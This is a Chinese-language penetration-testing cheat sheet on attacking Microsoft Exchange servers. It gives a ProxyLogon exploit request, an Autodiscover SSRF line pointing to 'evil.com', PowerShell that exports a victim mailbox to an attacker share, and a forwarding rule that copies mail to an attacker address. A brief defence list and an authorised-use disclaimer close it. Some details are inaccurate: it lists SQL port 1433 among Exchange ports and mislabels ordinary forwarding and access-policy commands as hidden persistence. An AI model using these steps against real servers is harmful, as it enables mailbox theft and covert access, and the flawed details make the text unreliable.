Exchange利用方式总结
字数 1052 2025-08-06 18:07:42
Exchange服务器渗透测试技术总结
一、Exchange服务器基础认知
1.1 Exchange服务器角色演变
- Exchange Server 2010:包含五个服务器角色
- Exchange Server 2013:精简为三个服务器角色
- 邮箱服务器(Mailbox Server):负责认证、重定向、代理客户端连接请求
- 客户端访问服务器(Client Access Server)
- 边缘传输服务器(Edge Transport Server)
二、Exchange信息收集技术
2.1 SPN查询技术
# 使用PowerShell查询Exchange服务
setspn -T domain.com -Q */*
2.2 端口扫描识别
常见Exchange服务端口:
- 25 (SMTP)
- 80/443 (HTTP/HTTPS)
- 135 (RPC)
- 445 (SMB)
- 1433 (SQL)
- 5985 (WinRM HTTP)
- 9389 (AD Web服务)
三、Exchange漏洞利用技术
3.1 认证相关漏洞
ProxyLogon漏洞(CVE-2021-26855)
- 利用方式:
POST /ecp/DDI/DDIService.svc/GetObject?schema=OABVirtualDirectory HTTP/1.1 Host: exchange-server Content-Type: text/xml X-BEResource: 服务器FQDN/autodiscover/autodiscover.xml?a=~1942062522
ProxyShell漏洞链
- CVE-2021-34473 (ACL绕过)
- CVE-2021-34523 (提权)
- CVE-2021-31207 (后门)
3.2 服务端请求伪造(SSRF)
利用Exchange Web Services(EWS)接口
- 通过Autodiscover服务泄露NTLM哈希
- 利用方式:
GET /autodiscover/autodiscover.xml?@evil.com/
四、后渗透技术
4.1 邮箱数据导出
使用PowerShell导出PST文件
New-MailboxExportRequest -Mailbox "目标邮箱" -FilePath "\\攻击机\share\export.pst"
4.2 权限维持技术
添加隐藏转发规则
Set-Mailbox -Identity "目标邮箱" -ForwardingAddress "攻击者邮箱" -DeliverToMailboxAndForward $true
创建隐藏的EWS管理应用
New-ApplicationAccessPolicy -AppId "攻击者AppId" -PolicyScopeGroupId "目标组" -AccessRight RestrictAccess
五、防御检测建议
- 及时更新补丁:确保Exchange服务器安装最新安全更新
- 禁用不必要的服务:如Autodiscover、EWS等非必需服务
- 日志监控:
- 监控异常Powershell命令执行
- 监控异常的邮箱导出请求
- 监控异常的转发规则添加
- 网络隔离:将Exchange服务器置于DMZ区域,限制内部网络访问
六、常见错误修正
- SPN查询错误:确保使用正确的查询命令,避免混淆SMB流量监听
- 图片引用错误:技术文档中图片应与内容严格对应,避免误导
七、参考工具
- Ruler:Exchange服务器攻击框架
- MailSniper:Exchange环境信息收集工具
- PrivExchange:利用Exchange进行域提权
- Exchange2domain:通过Exchange服务器获取域控权限
注:本文档仅用于安全研究目的,实际测试需获得合法授权。